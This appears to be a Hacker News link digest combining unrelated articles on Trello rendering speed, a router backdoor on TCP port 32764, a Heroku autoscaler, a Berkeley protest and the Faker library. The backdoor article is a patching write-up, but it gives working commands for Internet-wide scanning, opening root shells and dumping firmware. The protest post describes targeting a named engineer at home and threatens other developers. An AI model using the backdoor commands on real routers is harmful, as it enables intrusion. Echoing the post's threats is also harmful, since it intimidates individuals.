Channel: Hacker News 50

We spent a week making Trello boards load extremely fast. Here’s how we did it. - Fog Creek Blog


URL:http://blog.fogcreek.com/we-spent-a-week-making-trello-boards-load-extremely-fast-heres-how-we-did-it/


We made a promise with Trello: you can see your entire project in a single glance. That means we can show you all of your cards so you can easily see things like who is doing what, where a task is in the process, and so forth, just by scrolling.

You all make lots of cards. But when the site went to load all of your hundreds and thousands of cards at once, boards were loading pretty slow. Okay, not just pretty slow, painfully slow. If you had a thousand or so cards, it would take seven to eight seconds to completely render. In that time, the browser was totally locked up. You couldn’t click anything. You couldn’t scroll. You just had to sit there.

With the big redesign, one of our goals was to make switching boards really easy. We like to think that we achieved that goal. But when the browser locked up every time you switched boards, it was an awfully slow experience. Who cared if the experience was easy? We had to make it fast.

So I set out on a mission: using a 906 card board on a 1400×1000 pixel window, I wanted to improve board rendering performance by 10% every day for a week. It was bold. It was crazy. Somebody might have said it was impossible. But I proved that theoretical person wrong. We more than achieved that goal. We got perceived rendering time for our big board down to one second.

Naturally, I kept track of my daily progress and implementation details in Trello. Here’s the log.

Monday (7.2 seconds down to 6.7 seconds. 7% reduction.)

Heavy styles like borders, shadows, and gradients can really slow down a browser. So the first thing we tried was removing things like borders on avatars, card borders, backgrounds and borders on card badges, shadows on lists, and the like. It made a big impact, especially for scrolling. We didn’t set out for a flat design. Our primary objective was to make things faster, but the result was a cleaner, simpler look.

Tuesday (6.7 seconds down to 5.9 seconds. 12% reduction.)

On the client, we use backbone.js to structure our app. With backbone, it’s really convenient to use views. Really, very convenient. For every card, we gave each member its own view. When you clicked on a member on a card, it came up with a mini-profile and a menu with an option to remove them from the card. All those extra views generated a lot of useless crap for the browser and used up a bunch of time.

So instead of using views for members, we now just render the avatars and use a generic click handler that looks for a data-idmem attribute on the element. That’s used to look up the member model to generate the menu view, but only when it’s needed. That made a difference.

I also gutted more CSS.

Wednesday (5.9 seconds… to 5.9 seconds. 0% reduction.)

I tried using the browser’s native innerHTML and getElementsByClassName APIs instead of jQuery’s html and append. I thought native APIs might be easier for the browser to optimize, and what I read confirmed that. But for whatever reason, it didn’t make much of a difference for Trello.

The rest of the day was a waste. I didn’t make much progress.

Thursday (5.9 seconds down to 960ms)

Thursday was a breakthrough. I tried two major things: preventing layout thrashing and progressive rendering. They both made a huge difference.

Preventing layout thrashing

First, layout thrashing. The browser does two major things when rendering HTML: layouts, which are calculations to determine the dimensions and position of the element, and paints, which make the pixels show up in the right spot with the correct color. Basically. We cut out some of the paints when we removed the heavy styles. There were fewer borders, backgrounds, and other pixels that the browser had to deal with. But we still had an issue with layouts.

Rendering a single card used to work like this. The card basics like the white card frame and card name were inserted into the DOM. Then we inserted the labels, then the members, then the badges, and so on. We did it this way because of another Trello promise: real-time updates. We needed a way to atomically render a section of a card when something changed. For example, when a member was added it triggered the cardView.renderMembers method so that it only rendered the members and didn’t need to re-render the whole card and cause an annoying flash.

Instead of building all the HTML upfront, inserting it into the DOM, and triggering a layout just once, we built some HTML, inserted it into the DOM, triggered a layout, built more HTML, inserted it into the DOM, triggered a layout, built more HTML, and so on. Multiple insertions for each card. Times a thousand. That’s a lot of layouts. Now we render those sections before inserting the card into the DOM, which prevents a bunch of layouts and speeds things up.

In the old way, the card view render function looked something like this…

render: ->
  data = model.toJSON()
  @$.innerHTML = templates.fill(
    'card_in_list',
    data
  ) # add stuff to the DOM, layout
  @renderMembers() # add more stuff to the DOM, layout
  @renderLabels() # add even more stuff to the DOM, layout
  @

With the change, the render function looks something like this…

render: ->
  data = model.toJSON()
  data.memberData = []
  for member in members
    data.memberData.push member.toJSON()
  data.labelData = []
  for label in labels when label.isActive
    data.labelData.push label
  partials =
    "member": templates.member
    "label": templates.label
  @$.innerHTML = templates.fill(
    'card_in_list',
    data,
    partials
  ) # only add stuff to the DOM once, only one layout
  @

We had more layout problems, though. In the past, the width of the list would adjust to your screen size. So if you had three lists, it would try to fill up as much of the screen as possible. It was a subtle effect. The problem was that when the adjustment happened, the layout of every list and every card would need to be changed, causing major layout thrashing. And it triggered often: when you toggled the sidebar, added a list, resized the window, or whatnot. We tried having lists be a fixed width so we didn’t have to do all the calculations and layouts. It worked well so we kept it. You don’t get the adjustments, but it was a trade-off we were willing to make.

Progressive rendering

Even with all the progress, the browser was still locking up for five seconds. That was unacceptable, even though I technically reached my goal. According to Chrome DevTools’ Timeline, most of the time was being spent in scripts. Trello developer Brett Kiefer had fixed a previous UI lockup by deferring the initialization of jQuery UI droppables until after the board had been painted using the queue method in the async library. In that case, “click … long task … paint” became ”click … paint … long task“.

I wondered if a similar technique could be used for rendering cards progressively. Instead of spending all of the browser’s time generating one huge amount of DOM to insert, we could generate a small amount of DOM, insert it, generate another small amount, insert it, and so forth, so that the browser could free up the UI thread, paint something quickly, and prevent locking up. This really did the trick. Perceived rendering went down to 960ms on my 1,000 card board.

That looks something like this…

Here’s how the code works. Cards in a list are contained in a backbone collection. That collection has its own view. The card collection view render method with the queueing technique looks like this, roughly…

render: ->
  renderQueue = new async.queue (models, next) =>
    @appendSubviews(@subview(CardView, model) for model in models)
    # _.defer, a.k.a. setTimeout(fn, 0), will yield the UI thread
    # so the browser can paint.
    _.defer next
  , 1
  chunkSize = 30
  models = @getModels()
  modelChunks = []
  while models.length > 0
    modelChunks.push(models.splice(0, chunkSize))
  for models in modelChunks
    # async.queue flattens arrays, so let's wrap this array
    # so it's an array on the other end...
    renderQueue.push [models]
  @

We could probably just do a for loop with a setTimeout 0 and get the same effect since we know the size of the array. But it worked, so I was happy. There is still some slowness as the cards finish rendering on really big boards, but compared to total browser lock-up, we’ll accept that trade-off.
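The chunk-and-yield idea is language-agnostic. Here is a minimal sketch in Python, with asyncio's event loop standing in for the browser's UI thread (the names are ours for illustration, not Trello's code):

```python
import asyncio

async def render_progressively(items, render_chunk, chunk_size=30):
    """Process `items` in chunks, yielding the event loop between chunks.

    This mirrors the async.queue/_.defer trick: each unit of work is
    small, so other tasks (for a browser, a paint) can run in between.
    """
    results = []
    for i in range(0, len(items), chunk_size):
        results.extend(render_chunk(items[i:i + chunk_size]))
        await asyncio.sleep(0)  # yield control, like setTimeout(fn, 0)
    return results
```

The output is identical to a plain loop; the only difference is that the loop never holds the event loop hostage for more than one chunk's worth of work.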

Trello developer Daniel LeCheminant chipped in by queueing event delegation on cards. Every card has a certain number of events for clicking, dragging, and so forth. It’s more stuff we can put off until later.

We also used the translateZ(0) hack for a bit of gain. With covers, stickers, and member avatars, cards can have a lot of images. In your CSS, if you apply transform: translateZ(0) to the image element, you trick the browser into using the GPU to paint it. That frees up the CPU to do one of the many other things it needs to do. This browser behavior could change any day, which makes it a hack, but hey, it worked.

Friday

I made a lot of bugs that week, so I fixed them on Friday.

That was the whole week. If rendering on your web client is slow, look for excessive paints and layouts. I highly recommend using Chrome DevTools’ Timeline to help you find trouble areas. If you’re in a situation where you need to render a lot of things at once, look into async.queue or some other progressive rendering technique.

Now that we have starred boards and fast board switching and rendering, it’s easier than ever to use multiple boards for your project. We wrote “Using Multiple Boards for a Super-Flexible Workflow” on the Trello blog to show you how to do it. On the UserVoice blog, there’s a great article about how they structure their workflow into different boards. Check those out.

If you’ve got questions, I’ll try and answer them on Twitter. Go try out the latest updates on trello.com. It’s faster, easier, and more beautiful than ever.



TCP backdoor 32764 or how we could patch the Internet (or part of it ;))


URL:http://blog.quarkslab.com/tcp-backdoor-32764-or-how-we-could-patch-the-internet-or-part-of-it.html


Eloi Vanderbéken recently found a backdoor in some common routers, which he describes on his GitHub page. Basically, a process listens on TCP port 32764, sometimes accessible from the WAN interface. We scanned the IPv4 Internet to look for routers that have this backdoor wide open, and gathered some statistics about them. We will also present a way to permanently remove this backdoor on Linksys WAG200N routers.

Note that although this backdoor allows free access to many hosts on the Internet, no patch is available, as the firmware is no longer maintained. So we thought about some tricks, combined with our tools, to imagine how to fix that worldwide.

This backdoor doesn't have any kind of authentication and allows various remote commands, like:

  • remote root shell
  • NVRAM configuration dump: Wifi and/or PPPoE credentials can be extracted for instance
  • file copy

Let's see how many routers are still exposed to this vulnerability, and propose a way to remove this backdoor.

Looking for the backdoor on the Internet

We first used masscan to look for hosts with TCP port 32764 open. We ended up with about 1 million IPv4 addresses. The scan took about 50 hours on a low-end Linux virtual server.

Then, we had to determine whether this was really the backdoor exposed, or some other false positive.

Eloi's POC shows a clear way to do this:

  • Send a packet to the host device
  • Wait for an answer with 0x53634D4D (or 0x4D4D6353, according to the endianness of the device, see below)
  • In such a case, the backdoor is here and accessible.

In order to check the IPs previously discovered, we couldn't use masscan or a similar tool (as they don't have any "plugin" feature). Moreover, sequentially establishing a connection to each IP to verify that the backdoor is present would take ages. For instance, with a 1 second timeout, the worst case scenario is 1 million seconds (about 12 days), and even if half the hosts answered immediately, it would still run for 6 days. Quick process-based parallelism could help and might divide this time by 10 or 20. That still remains a lot, and it is not the right way to do this.

We thus decided to quickly code a scanner based on asynchronous sockets that checks the availability of the backdoor. The advantage of asynchronous sockets is that lots of them (about 30k in our tests) can be managed at the same time, thus handling 30k hosts in parallel. This kind of parallelism couldn't be achieved with classical process- (or thread-) based parallelism.

This asynchronous model is somehow the same one used by masscan and zmap, except that they bypass sockets to emit packets directly (and thus manage more hosts simultaneously).

Using a classical Linux system, a first implementation using the select function and a five second timeout would perform at best ~1000 tests/second. The limitation is mainly due to the fact that FD_SETSIZE, on most Linux systems, is set by default to 1024. This means that the maximum file descriptor identifier that select can handle is 1024 (and thus the number of descriptors is less than or equal to this limit). In the end, this limits the number of sockets that can be opened at the same time, and thus the overall scan performance.

Fortunately, other models that do not have this limitation exist. epoll is one of them. After adapting our code, our system was able to test about 6k IP/s (using 30k sockets simultaneously). That is less than what masscan and/or zmap can do (in terms of packets/s), but it gave good enough performance for what we needed to do.
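To give a sense of what such an asynchronous checker looks like, here is a minimal sketch in Python with asyncio (our illustration, not Quarkslab's actual scanner; the probe payload below is a dummy placeholder, the real request format is in Eloi's PoC):

```python
import asyncio

# First four bytes of the backdoor's reply, depending on the CPU:
SIGNATURES = {b"MMcS": "little-endian", b"ScMM": "big-endian"}

async def probe(host, port=32764, timeout=5.0):
    """Return the detected endianness, or None if not the backdoor."""
    try:
        reader, writer = await asyncio.wait_for(
            asyncio.open_connection(host, port), timeout)
    except (OSError, asyncio.TimeoutError):
        return None
    try:
        writer.write(b"\x00" * 12)  # dummy request; see Eloi's PoC for the real one
        await writer.drain()
        head = await asyncio.wait_for(reader.readexactly(4), timeout)
        return SIGNATURES.get(head)
    except (OSError, asyncio.IncompleteReadError, asyncio.TimeoutError):
        return None
    finally:
        writer.close()

async def scan(hosts, concurrency=30000):
    """Check many hosts in parallel, capped by a semaphore."""
    sem = asyncio.Semaphore(concurrency)
    async def bounded(host):
        async with sem:
            return host, await probe(host)
    return dict(await asyncio.gather(*(bounded(h) for h in hosts)))
```

Because every probe is just a pending socket rather than a process or thread, tens of thousands can be in flight at once, which is exactly the property the article relies on.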

In the end, we found about 6500 routers running this backdoor.

Sources for these scanners are not ready to be published yet (trust me), but stay tuned :)

Note about big vs. little endian

The people that coded this backdoor didn't care about the endianness of the underlying CPU. That's why the signature that is received can have two different values.

To exploit the backdoor, one has to first determine the endianness of the remote router. This is done by checking the received signature: 0x53634D4D means little-endian, 0x4D4D6353 big-endian.
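In code, that check is a few lines with Python's struct module (a sketch of the logic, not Quarkslab's code): read the first four reply bytes as a little-endian unsigned int and compare against the two constants.

```python
import struct

LITTLE_SIG = 0x53634D4D  # reply bytes b"MMcS" read as "<I"
BIG_SIG = 0x4D4D6353     # reply bytes b"ScMM" read as "<I"

def endianness_from_reply(first4):
    """Classify a router from the first four bytes of its reply."""
    if len(first4) < 4:
        return None
    (value,) = struct.unpack("<I", first4[:4])
    if value == LITTLE_SIG:
        return "little-endian"
    if value == BIG_SIG:
        return "big-endian"
    return None  # not the backdoor signature
```

The same four bytes on the wire simply decode to a different integer depending on which CPU wrote them, which is why a single read disambiguates the two router families.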

The nerve of a good patch: information

As we are looking to provide a patch for the firmware, we needed to know what was out there: which hardware, where it is, and so on.

Hardware devices

We tried to identify the different hardware devices. It is not obvious at first, and there are several ways to do this by hand:

  • Look for this information in the web interface;
  • Parse the various configuration scripts;
  • grep for "netgear", "linksys" and other manufacturers;
  • Look for files with specific names (like WAG160N.ico)

It is a bit hard to automate that process. Fortunately for us, a "version" field can be obtained from the backdoor. This field seems to be consistent across the same hardware. Unfortunately, the mapping between this version field and the real hardware still has to be done by hand. This process is not perfect, but so far we haven't seen two different hardware models with the same "version" field.

Moreover, Cisco WAP4410 access points don't support this query but can be identified through the "sys_desc" variable (in their internal configuration).

The final distribution of hardware models is the following:

As you can see, there is still work to do in order to identify all the different hardware models.

Country statistics

Another interesting statistic is the distribution by country of the backdoored routers (based on Maxmind's public GeoIP database):

The unlucky ones are the United States, followed by the Netherlands, with China very close.

Reconstructing a new filesystem

In order to provide a new clean filesystem, we needed to dump one from a router. So we first used the backdoor to retrieve such a filesystem. Moreover, analyzing it makes it easier to understand how the router works and is configured.

We made our experiments on our Linksys WAG200N. These techniques might or might not work on others. On this particular router (and maybe others), a telnet daemon executable is available (/usr/sbin/utelnetd). It can be launched through the backdoor and directly drops a root shell.

The backdoor allows us to execute commands as the root user and to copy files. Unfortunately, on many routers, there is no SSH daemon that can be started, nor even a netcat utility for easy and quick transfers. Moreover, the only writable partition is generally a RAMFS mounted on /tmp.

So let's see what our options are here.

Option 1: download through the web server

Lots of routers have a web server that is used for their configuration. This web server (like every process running on the router) runs as the root user. This is potentially a good way to download files (and the rootfs) from the router.

For instance, on the Linksys WAG200N (and others), /www/ppp_log is a symbolic link to /tmp/ppp_log (for the web server to show the PPP log). Thus, the root FS can be downloaded like this:

  • Get a root shell thanks to the backdoor
# cd /tmp
# mkdir ppp_log
# cd ppp_log && cat /dev/mtdblock/0 >./rootfs
  • When it's done, on your computer: wget http://IP/ppp_log/rootfs

The MTD partition to use can be identified thanks to various methods. /proc/mtd is a first try. In our case:

# cat /proc/mtd
dev: size erasesize name
mtd0: 002d0000 00010000 "mtd0"
mtd1: 000b0000 00010000 "mtd1"
mtd2: 00020000 00010000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 00010000 00010000 "mtd4"
mtd5: 00040000 00010000 "mtd5"

The name does not give a lot of information. But, from the size of the partitions, we can guess that mtd0 is the rootfs (~2.8MB). Moreover, a symlink in /dev validates this assumption:

# ls -la /dev
[...] root -> mtdblock/0

Option 2: MIPS cross compilation, netcat and upload

Another way to dump the rootfs is to cross compile a tool like netcat for the targeted architecture. Remember, we have little and big endian MIPS systems. Thus, we potentially need a cross compilation chain for these two systems.

By analyzing some binaries on our test router, it appears that the manufacturer used the uClibc library and toolchains, with versions from 2005. Thus, we downloaded one of the uClibc versions released that year. After some difficulty finding the old versions of binutils, gcc (and others) and getting a working GCC 3.x compiler, our MIPSLE cross compiler was ready.

Then, we grabbed the netcat sources and compiled them. There are multiple ways to upload our freshly compiled binary to the router. The first one is to use the write "feature" of the backdoor:

$ ./poc.py --ip IP --send_file ./nc --remote-filename nc

This has been implemented in Eloi's POC here: https://raw.github.com/elvanderb/TCP-32764/master/poc.py .

The issue with this feature is that it seems to crash with "big" files.

Another technique is to use echo -n -e to transfer our binary. It works but is a bit slow. Also, the connection is sometimes closed by the router, so we have to restart where it stopped. Just do:

$ ./poc.py --ip IP --send_file2 ./nc --remote-filename nc

The MIPSEL netcat binary can be downloaded here: https://github.com/quarkslab/linksys-wag200N/blob/master/binaries/nc?raw=true.

Once netcat has been uploaded, simply launch on the router:

# cat /dev/mtdblock/0 |nc -n -v -l -p 4444

And, on your computer:

$ nc -n -v IP 4444 >./rootfs.img

Patch me if you can (yes we can)

Please note that everything described here is experimental and should only be done if you know exactly what you are doing. We can't be held responsible for any damage you do to your beloved routers!

Note: the tools mentioned here are available on GitHub: https://github.com/quarkslab/linksys-wag200N.

Now that we have the original squashfs image, we can extract it. It is a well-known SquashFS, so let's grab the latest version (4.0 at the time of writing this article) and "unsquash" it:

$ unsquashfs original.img
Parallel unsquashfs: Using 8 processors
gzip uncompress failed with error code -3
read_block: failed to read block @0x1c139c
read_fragment_table: failed to read fragment table block
FATAL ERROR:failed to read fragment table
$ unsquashfs -s original.img
Found a valid little endian SQUASHFS 2:0 superblock on ./original.img
[...]
Block size 32768

This is the same issue Eloi pointed out in his slides. He shows that he had to force LZMA to be used for the extraction. With the fixes he provided (exercise also left to the reader), we can extract the SquashFS:

# unsquashfs-lzma original.img
290 inodes (449 blocks) to write
created 189 files
created 28 directories
created 69 symlinks
created 32 devices
created 0 fifos

What actually happened is that, back in 2005, the developer of this firmware modified the SquashFS 2.0 tools to use LZMA (and not gzip). Even if Eloi's "chainsaw" solution worked for extraction, it will not allow us to make a new image in the 2.0 format. So, back to the chainsaw: grab the squashfs 2.2 release from SourceForge and the LZMA 4.65 SDK, and make squashfs use it with this patch: https://github.com/quarkslab/linksys-wag200N/blob/master/src/squashfs-lzma.patch. The final sources can be downloaded here: https://github.com/quarkslab/linksys-wag200N/tree/master/src/squashfs2.2-r2-lzma.

With our new and freshly compiled SquashFS LZMA-enhanced 2.2 version back from the dead, we can now reconstruct the Linksys rootfs image. It is important to respect the endianness and the block size of the original image (or your router won't boot anymore).

$ ./squashfs2.2-r2-lzma/squashfs-tools/mksquashfs rootfs/ rootfs.img -2.0 -b 32768
Creating little endian 2.0 filesystem on modified-bis.img, block size 32768.
Little endian filesystem, data block size 32768, compressed data, compressed metadata, compressed fragments
[...]
$ unsquashfs -s rootfs.img
Found a valid little endian SQUASHFS 2:0 superblock on rootfs.img.
Creation or last append time Wed Jan 22 10:38:29 2014
Filesystem size 1829.09 Kbytes (1.79 Mbytes)
Block size 32768
[...]

Now, let's begin with the nice part. To test that our image works, we'll upload and flash it to the router. This step is critical, because if it fails, you'll end up with a router trying to boot from a corrupted root filesystem.

First, we use our previously compiled netcat binary to upload the newly created image (or use any other method of your choice):

On the router side:

# nc -n -v -l -p 4444 >/tmp/rootfs.img

On the computer side:

$ cat rootfs.img |nc -n -v IP 4444

When it's finished, have a little prayer and, on the router side:

# cat /tmp/rootfs.img >/dev/mtdblock/0

Then, power-cycle your router! If everything went well, your router should reboot just like before. If not, you will need to reflash it another way, using the serial console or any available JTAG port (not covered here).

Now, we can simply permanently remove the backdoor from the root filesystem:

# cd /path/to/original/fs
# rm usr/sbin/scfgmgr
# Edit usr/etc/rcS and remove the following line
/usr/sbin/scfgmgr

Then, rebuild your image as above, upload it, flash your router, and the backdoor should be gone forever! It's up to you to build an SSH daemon to keep root access on your router if you still want to play with it.

Linksys WAG200N patch procedure

For those who would just like to patch their routers, here are the steps. Please note that this has only been tested on our Linksys WAG200N! It is really not recommended to use it with other hardware. And, we repeat, we cannot be held responsible for any harm to your routers! Use this at your own risk.

  • First, upload the patched image to the router:
$ ./poc.py --ip IP --send_file2 nobackdoor.img --remote-filename rootfs
  • Then get a root shell on your router:
$ ./poc.py --ip IP --shell
  • Check that the file sizes are the same:
# ls -l /tmp/rootfs
# it should be 1875968 bytes
  • To be sure, just redownload the uploaded image thanks to the web server and check that they are the same:
# mkdir /tmp/ppp_log
# ln -s /tmp/rootfs /tmp/ppp_log
And, on your computer:
$ wget http://IP/ppp_log/rootfs
$ diff ./rootfs /path/to/linksysWAG200N.nobackdoor.rootfs
  • Finally, flash the image from the root shell:
# cat /tmp/rootfs >/dev/mtdblock/0

Conclusion

This article showed some statistics about the presence of the backdoor found by Eloi Vanderbéken and how to fix one of the affected devices. Feel free to point out any mistakes, and/or provide similar images and/or fixes for other routers :)

Acknowledgements

  • Eloi Vanderbéken for his discovery and original POC
  • Fred Raynal, Fernand Lone-Sang, @pod2g, Serge Guelton and Kévin Szkudlapski for their corrections


Dynosaur: A Heroku Autoscaler - Harry's Engineering


URL:http://engineering.harrys.com/2014/01/02/dynosaur-a-heroku-autoscaler.html


We are excited to announce the first release of Dynosaur, our Heroku autoscaler that uses the Google Analytics Live API to dynamically provision Heroku dynos based on the number of current users on the site.

The main autoscaler engine lives in its own gem and can be run on the command line with a config file (e.g. as a Heroku worker process!) but we also wrote a simple web interface for it. Dynosaur-rails can be trivially deployed as a Heroku app, and it allows you to manually tweak the minimum number of dynos at runtime, in case your autoscaler estimates are off.

How it works

Dynosaur uses one or more plugins to determine the estimated number of dynos required, then hits the Heroku API to set the correct value. We err on the side of caution and wait a fixed amount of time after any change before reducing the number of dynos.

The first (and only!) plugin uses the Google Analytics Live API (currently in private beta) and a configurable ‘users per dyno’ value to estimate the required number of dynos.

This chart shows how the Analytics plugin estimated our required dynos during a test. The blue line is the number of active users on the site. The orange line is the number of dynos required (configured to 10 users per dyno for this test).

For the same time period, we can see that the combined estimated number of dynos (green line) follows the Analytics plugin, except it has a minimum of 1 dyno and never drops to zero. The actual selected number of dynos (blue line) follows the estimate as it climbs, but as it descends it goes slower, since we have the blackout interval set at 5 minutes.

The Web Interface

We made a little Rails app to make it easier to deploy, monitor and configure Dynosaur. It has very few features:

  • Modify parameters such as minimum dynos at runtime
  • View the current values (current dynos, what each plugin is estimating, current plugin results etc)
  • Configure plugins (it automatically detects parameters that can be configured)
  • Runs the Dynosaur code within the Rails app, so it's easy to deploy on Heroku.

Mmmm, Bootstrap! Have some screenshots:

Status View

Configure Main App

Configure Google Analytics Plugin

Securing the Web Interface

We restrict access to Dynosaur-rails with http basic auth (configured via Heroku environment variables) and an IP whitelist (also configured through environment variables).

Pluggable

Number of active users suits our usage well, but one could equally use app response time from NewRelic or some other core metric for your app to decide how to scale. See the README for more info on extending Dynosaur with new plugins.

When multiple plugins are enabled, Dynosaur will combine them by taking the maximum value, thus each plugin really defines a floor for the number of dynos.
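That combination rule, plus the scale-down blackout described earlier, fits in a few lines. A sketch of the decision logic in Python (illustrative names and structure, not Dynosaur's actual API):

```python
def combine_estimates(estimates, minimum=1, maximum=None):
    """Take the max of all plugin estimates, clamped to the configured bounds."""
    wanted = max(estimates) if estimates else minimum
    wanted = max(wanted, minimum)
    if maximum is not None:
        wanted = min(wanted, maximum)
    return wanted

class Scaler:
    """Scale up immediately; scale down only after a blackout interval."""

    def __init__(self, blackout_s=300):
        self.blackout_s = blackout_s
        self.current = 1
        self.last_change = 0.0

    def decide(self, estimates, now):
        target = combine_estimates(estimates)
        if target > self.current:
            # Climb right away so traffic spikes are absorbed.
            self.current, self.last_change = target, now
        elif target < self.current and now - self.last_change >= self.blackout_s:
            # Descend only once the blackout interval has elapsed.
            self.current, self.last_change = target, now
        return self.current
```

Because each plugin only ever raises the max, adding a plugin can never shrink the fleet below what another plugin demands, which is the "each plugin defines a floor" behavior.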

Stats

Dynosaur can optionally use Librato to collect some statistics on its operation. We track the estimated dynos (based on combined estimates from all plugins), and the value we have actually chosen (including delay before downsizing and min/max dyno settings). Also, for each plugin configured we track the value (e.g. ‘current users on site’) and the estimate of dynos required by that plugin. To enable statistics, just create a free Librato account and configure Dynosaur with the account email address and API key.

Awesomeness

Dynosaur is letting us skip that whole rigmarole of wake-up-at-6am-because-we-were-featured-in-the-NYT-and-traffic-is-through-the-roof. More sleep equals happy developers, and this new API from Google is proving very useful to us from an operations perspective. We want you to be happy too, so please use it, write new plugins, fix bugs and open pull requests!

Demonstration at Home of Google Developer. Google Bus Blocked in Berkeley. : Indybay


URL:https://www.indybay.org/newsitems/2014/01/21/18749504.php


At 7am this morning, a group of people went to the home of Anthony Levandowski, a Google X developer. His house is a pompous, minimally decorated two story palace with stone lions guarding the door. After ringing his doorbell to alert him of the protest, a banner was held in front of his house that read "Google's Future Stops Here" and fliers about him were distributed around the neighborhood. The fliers detailed his work with the defense industry and his plans to develop luxury condos in Berkeley. The flier is attached below.

At one point, his neighbor emerged from her house. She said she knew about his collaboration with the military but insisted he was a "nice person." We see no contradiction here. It is very likely that this person, who develops war robots for the military and builds surveillance infrastructure, is a pleasant neighbor. But so what?

After previous actions against the Google buses, many critics insisted that the individual Google employees are not to blame. Taking this deeply to heart, we chose to block Anthony Levandowski's personal commute. We also respectfully disagree with this criticism: We don't see one action as better than the other. All of Google's employees should be prevented from getting to work. All surveillance infrastructure should be destroyed. No luxury condos should be built. No one should be displaced.

After fliering his neighborhood and blocking his driveway for approximately 45 minutes, the group went down and blocked a google bus at Ashby BART. This blockade lasted about 30 minutes and dispersed when BPD arrived. Several conversations took place with Google employees.

Luckily, the defections have already begun. Yesterday, an actually-nice person employed by Google leaked the talking points the company sent to its employees should they attend an upcoming SF City Council meeting or in the event of a bus disruption. These talking points paint Google employees as positive contributors to the neighborhoods they live in. They make no mention of the displacement those employees cause, the police presence they bring with them, or the large class of people working to support their out-of-touch and extravagant lifestyles: the tech support.

We will not be held hostage by Google's threat to release massive amounts of carbon should the bus service be stopped. Our problem is with Google, its pervasive surveillance capabilities utilized by the NSA, the technologies it is developing, and the gentrification its employees are causing in every city they inhabit. But our problem does not stop with Google. All of you other tech companies, all of you other developers and everyone else building the new surveillance state--We're coming for you next.

VMware Buys AirWatch for $1.54 Billion


Faker by joke2k


Comments:"Faker by joke2k"

URL:http://www.joke2k.net/faker/


_|_|_|_| _|
_| _|_|_| _| _| _|_| _| _|_|
_|_|_| _| _| _|_| _|_|_|_| _|_|
_| _| _| _| _| _| _|
_| _|_|_| _| _| _|_|_| _|

Faker

Faker is a Python package that generates fake data for you. Whether you need to bootstrap your database, create good-looking XML documents, fill-in your persistence to stress test it, or anonymize data taken from a production service, Faker is for you.

Faker is heavily inspired by PHP's Faker, Perl's Data::Faker, and Ruby's Faker.

Basic Usage

Install with pip:

pip install fake-factory

Use faker.Factory.create() to create and initialize a faker generator, which can generate data by accessing properties named after the type of data you want.

from faker import Factory

faker = Factory.create()

faker.name()
# 'Lucy Cechtelar'

faker.address()
# "426 Jordy Lodge
# Cartwrightshire, SC 88120-6700"

faker.text()
# Sint velit eveniet. Rerum atque repellat voluptatem quia rerum. Numquam excepturi
# beatae sint laudantium consequatur. Magni occaecati itaque sint et sit tempore. Nesciunt
# amet quidem. Iusto deleniti cum autem ad quia aperiam.
# A consectetur quos aliquam. In iste aliquid et aut similique suscipit. Consequatur qui
# quaerat iste minus hic expedita. Consequuntur error magni et laboriosam. Aut aspernatur
# voluptatem sit aliquam. Dolores voluptatum est.
# Aut molestias et maxime. Fugit autem facilis quos vero. Eius quibusdam possimus est.
# Ea quaerat et quisquam. Deleniti sunt quam. Adipisci consequatur id in occaecati.
# Et sint et. Ut ducimus quod nemo ab voluptatum.

Each call to the method faker.name() yields a different (random) result. This is because faker uses __getattr__ magic, and forwards faker.Generator.method_name() calls to faker.Generator.format(method_name).

for i in range(0, 10):
    print faker.name()
# Adaline Reichel
# Dr. Santa Prosacco DVM
# Noemy Vandervort V
# Lexi O'Conner
# Gracie Weber
# Roscoe Johns
# Emmett Lebsack
# Keegan Thiel
# Wellington Koelpin II
# Ms. Karley Kiehn V
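The __getattr__ forwarding described above can be sketched in a few lines of plain Python. This is a simplified illustration of the mechanism, not faker's actual source; the class bodies are hypothetical stand-ins:

```python
class Generator:
    """Holds the formatter methods (real faker packages these in providers)."""

    def name(self):
        return "Lucy Cechtelar"

    def format(self, formatter):
        # Look the formatter up by name and call it.
        return getattr(self, formatter)()


class Faker:
    def __init__(self):
        self.generator = Generator()

    def __getattr__(self, attr):
        # Only called for attributes Faker itself doesn't have:
        # fake.name() is forwarded to generator.format('name').
        return lambda: self.generator.format(attr)


fake = Faker()
print(fake.name())  # same as fake.generator.format('name')
```

Because __getattr__ only fires for missing attributes, any method defined directly on the facade still takes precedence over the forwarded formatters.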

Formatters

Each of the generator properties (like name, address, and lorem) is called a "formatter". A faker generator has many of them, packaged in "providers". Here is a list of the bundled formatters in the default locale.

faker.providers.File:

fake.mimeType() # video/webm

faker.providers.UserAgent:

fake.chrome() # Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8_4) AppleWebKit/5341 (KHTML, like Gecko) Chrome/13.0.803.0 Safari/5341
fake.firefox() # Mozilla/5.0 (Windows 95; sl-SI; rv:1.9.1.20) Gecko/2012-01-06 22:35:05 Firefox/3.8
fake.internetExplorer() # Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.1)
fake.linuxPlatformToken() # X11; Linux x86_64
fake.linuxProcessor() # x86_64
fake.macPlatformToken() # Macintosh; U; PPC Mac OS X 10_7_6
fake.macProcessor() # U; PPC
fake.opera() # Opera/9.41 (Windows CE; it-IT) Presto/2.9.168 Version/12.00
fake.safari() # Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/534.34.4 (KHTML, like Gecko) Version/5.0 Safari/534.34.4
fake.userAgent() # Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; en-US) AppleWebKit/531.15.3 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6531.15.3
fake.windowsPlatformToken() # Windows 98; Win 9x 4.90

faker.providers.PhoneNumber:

fake.phoneNumber() # (593)652-1880

faker.providers.Miscelleneous:

fake.boolean() # True
fake.countryCode() # BB
fake.languageCode() # fr
fake.locale() # pt_GN
fake.md5() # ab9d3552b5c6e68714c04c35725ba73c
fake.nullBoolean() # True
fake.sha1() # 3fc2ede28f2596050f9a94c15c59b800175409d0
fake.sha256() # f06561a971d6b1306ecef60be336556d6de2540c2d0d2158f4d0ea3f212cd740

faker.providers.Internet:

fake.companyEmail() # ggreenfelder@ortizmedhurst.com
fake.domainName() # mayer.com
fake.domainWord() # gusikowski
fake.email() # gbrakus@johns.net
fake.freeEmail() # abbey60@yahoo.com
fake.freeEmailDomain() # hotmail.com
fake.ipv4() # 81.132.249.71
fake.ipv6() # 4c55:8c8b:54b5:746d:44ed:c7ab:486a:a50e
fake.safeEmail() # amalia49@example.com
fake.slug() # TypeError
fake.tld() # net
